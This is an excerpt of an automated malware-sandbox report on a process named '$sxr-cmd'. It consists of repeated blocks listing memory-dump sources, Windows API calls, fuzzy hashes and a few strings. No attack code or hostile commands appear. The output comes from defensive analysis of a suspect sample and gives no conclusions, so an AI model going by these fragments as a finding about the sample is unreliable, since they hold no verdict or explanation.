                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$DriveNamePathTypeVolume
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1029679093-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2448200120-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1617791916-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF615503C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF615503D0C
                                                                                                                        • Part of subcall function 00007FF615503C24: towupper.MSVCRT ref: 00007FF615503D2F
                                                                                                                        • Part of subcall function 00007FF615503C24: iswalpha.MSVCRT ref: 00007FF615503D4F
                                                                                                                        • Part of subcall function 00007FF615503C24: towupper.MSVCRT ref: 00007FF615503D75
                                                                                                                        • Part of subcall function 00007FF615503C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF615503DBF
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF61551EA0F,?,?,?,00007FF61551E925,?,?,?,?,00007FF6154FB9B1), ref: 00007FF6154F6ABF
                                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,00007FF61551EA0F,?,?,?,00007FF61551E925,?,?,?,?,00007FF6154FB9B1), ref: 00007FF6154F6AD3
                                                                                                                        • Part of subcall function 00007FF6154F6B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF6154F6AE8,?,?,?,00007FF61551EA0F,?,?,?,00007FF61551E925), ref: 00007FF6154F6B8B
                                                                                                                        • Part of subcall function 00007FF6154F6B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF6154F6AE8,?,?,?,00007FF61551EA0F,?,?,?,00007FF61551E925), ref: 00007FF6154F6B97
                                                                                                                        • Part of subcall function 00007FF6154F6B84: RtlFreeHeap.NTDLL(?,?,?,?,00007FF6154F6AE8,?,?,?,00007FF61551EA0F,?,?,?,00007FF61551E925), ref: 00007FF6154F6BAF
                                                                                                                        • Part of subcall function 00007FF6154F6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154F6AF1,?,?,?,00007FF61551EA0F,?,?,?,00007FF61551E925), ref: 00007FF6154F6B39
                                                                                                                        • Part of subcall function 00007FF6154F6B30: RtlFreeHeap.NTDLL(?,?,?,00007FF6154F6AF1,?,?,?,00007FF61551EA0F,?,?,?,00007FF61551E925), ref: 00007FF6154F6B4D
                                                                                                                        • Part of subcall function 00007FF6154F6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154F6AF1,?,?,?,00007FF61551EA0F,?,?,?,00007FF61551E925), ref: 00007FF6154F6B59
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF61551EA0F,?,?,?,00007FF61551E925,?,?,?,?,00007FF6154FB9B1), ref: 00007FF6154F6B03
                                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,00007FF61551EA0F,?,?,?,00007FF61551E925,?,?,?,?,00007FF6154FB9B1), ref: 00007FF6154F6B17
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3512109576-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154FAF82), ref: 00007FF6154FB6D0
                                                                                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154FAF82), ref: 00007FF6154FB6E7
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154FAF82), ref: 00007FF6154FB701
                                                                                                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154FAF82), ref: 00007FF6154FB715
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocSize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2549470565-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF61550507A), ref: 00007FF61551D01C
                                                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF61550507A), ref: 00007FF61551D033
                                                                                                                      • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF61550507A), ref: 00007FF61551D06D
                                                                                                                      • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF61550507A), ref: 00007FF61551D07F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1033415088-0
                                                                                                                      • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                                      • Instruction ID: 1cdd1f3b29c598cb1349daefe1baa815fcf86587ca66a786985512f0f0d81b62
                                                                                                                      • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                                      • Instruction Fuzzy Hash: 83118236618E82C7DB449B20F05417AFBA0FB8AFA5F415135EA8E87B65EF3CD4458B00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 22757656-0
                                                                                                                      • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                                      • Instruction ID: d43923821bb41a12e981f0c062b68fcb927e0f1caa819c6cbd9f0d76e83a91d6
                                                                                                                      • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                                      • Instruction Fuzzy Hash: DF116075A18A4587E7104B28E44837DBAA0FB8AF74F654734D62E873E1CF3CD9498B00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF615515433,?,?,?,00007FF6155169B8,?,?,?,?,?,00007FF615508C39), ref: 00007FF6155156C5
                                                                                                                      • RtlFreeHeap.NTDLL(?,?,00000028,00007FF615515433,?,?,?,00007FF6155169B8,?,?,?,?,?,00007FF615508C39), ref: 00007FF6155156D9
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF615515433,?,?,?,00007FF6155169B8,?,?,?,?,?,00007FF615508C39), ref: 00007FF6155156FD
                                                                                                                      • RtlFreeHeap.NTDLL(?,?,00000028,00007FF615515433,?,?,?,00007FF6155169B8,?,?,?,?,?,00007FF615508C39), ref: 00007FF615515711
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3859560861-0
                                                                                                                      • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                      • Instruction ID: d6b292ecac321ace070e2fe02caa6d5a2ff79ba2f95b5dbbe4cd3bd0e6109084
                                                                                                                      • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                      • Instruction Fuzzy Hash: 23112576A04F81C6EB008F66E4440A8BBB0FB89F94B4D8125DB4E43728DF38E956C740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 140117192-0
                                                                                                                      • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                                      • Instruction ID: 4c3c7a3898737e81a2c7288e9e0c0ca6872fa635fff08deb29c0b13ba3f8e8df
                                                                                                                      • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                                      • Instruction Fuzzy Hash: 40217E3AA19F45C5E7408B64E884369B7B4FB99FA4F600136DA8D82774DF7DE846CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleMode_get_osfhandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1606018815-0
                                                                                                                      • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                                      • Instruction ID: 4f8d89fbe299c5eb11983ee3a987614c2acdd9ce5f34cdeee5ed707d9e466925
                                                                                                                      • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                                      • Instruction Fuzzy Hash: 6BF01C39A24E42CBD7045B20E844179FA60FF8AF22F859274DA0F423A5DF3CD8088B40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileType
                                                                                                                      • String ID: \\.\pipe\
                                                                                                                      • API String ID: 3081899298-91387939
                                                                                                                      • Opcode ID: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
                                                                                                                      • Instruction ID: 50df859e975970b90aadef6dc6e50906d93e1a52c7626bcce2e3e585afbcb2f6
                                                                                                                      • Opcode Fuzzy Hash: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
                                                                                                                      • Instruction Fuzzy Hash: 8C71E53260AB8446F7249FA6D95A3EE63B2F7857E4F800016DE4D4BB86EF36C504C740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF6154FCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154FB9A1,?,?,?,?,00007FF6154FD81A), ref: 00007FF6154FCDA6
                                                                                                                        • Part of subcall function 00007FF6154FCD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF6154FB9A1,?,?,?,?,00007FF6154FD81A), ref: 00007FF6154FCDBD
                                                                                                                      • wcschr.MSVCRT ref: 00007FF6155211DC
                                                                                                                      • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF61551827A), ref: 00007FF615521277
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocateProcessmemmovewcschr
                                                                                                                      • String ID: &()[]{}^=;!%'+,`~
                                                                                                                      • API String ID: 4220614737-381716982
                                                                                                                      • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                                      • Instruction ID: d7dfc8c3665e075938b1bad330367d409ee1bd68a0c36547ee939f81c0ac5e00
                                                                                                                      • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                                      • Instruction Fuzzy Hash: 6E719579908A42C6D760CF66A48067AF7E5FB94FA9F505235DA4DC3BB4DF3CA8418B00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF6155006C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF6155006D6
                                                                                                                        • Part of subcall function 00007FF6155006C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF6155006F0
                                                                                                                        • Part of subcall function 00007FF6155006C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF61550074D
                                                                                                                        • Part of subcall function 00007FF6155006C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF615500762
                                                                                                                      • longjmp.MSVCRT ref: 00007FF61550CCBC
                                                                                                                      • longjmp.MSVCRT(?,?,00000000,00007FF615501F69,?,?,?,?,?,?,?,00007FF6154F286E,00000000,00000000,00000000,00000000), ref: 00007FF61550CCE0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                                                      • String ID: GeToken: (%x) '%s'
                                                                                                                      • API String ID: 3282654869-1994581435
                                                                                                                      • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                                      • Instruction ID: c6ba8e2017261f1beabe7bd666a8d35fbe1633646802f46d63c57ff7b3301af3
                                                                                                                      • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                                      • Instruction Fuzzy Hash: CC61F025A09F428AFAA48B69D454179E391AF41FB9F544536CA1DCBBF1EF3CEC608300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileType
                                                                                                                      • String ID: \\.\pipe\
                                                                                                                      • API String ID: 3081899298-91387939
                                                                                                                      • Opcode ID: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
                                                                                                                      • Instruction ID: ea8f37d4f2e69e4cf408ee4398304f8d510f4e60f6cbb5d230eabb9dcd856170
                                                                                                                      • Opcode Fuzzy Hash: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
                                                                                                                      • Instruction Fuzzy Hash: 2951D82260EBC143F6749FA9A16C7AA6773F7957A0F840025DD8D0BB5BEA3BC5448B40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memmovewcsncmp
                                                                                                                      • String ID: 0123456789
                                                                                                                      • API String ID: 3879766669-2793719750
                                                                                                                      • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                                      • Instruction ID: f225a7486ceee327386fb5faaf78832d9ede47b5b4c4317ae672d23414c119f6
                                                                                                                      • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                                      • Instruction Fuzzy Hash: BB41C626F1AB86C5EA658F3594006BAA3A5FB44FA0F545131DE4E877B4DF3CD8458340
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6155197D0
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6154FD46E
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6154FD485
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: wcschr.MSVCRT ref: 00007FF6154FD4EE
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: iswspace.MSVCRT ref: 00007FF6154FD54D
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: wcschr.MSVCRT ref: 00007FF6154FD569
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: wcschr.MSVCRT ref: 00007FF6154FD58C
                                                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6155198D7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                                      • String ID: Software\Classes
                                                                                                                      • API String ID: 2714550308-1656466771
                                                                                                                      • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                                      • Instruction ID: b57c6ed30204de3e7f75f5b5c36d53253a78d46cac7dae61aad13bdc36b48c57
                                                                                                                      • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                                      • Instruction Fuzzy Hash: 41418C2AA09F5291EA009F1AD484479A7B4FB85FE0F508131DA5E877F5EF39EC52C340
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLastWrite
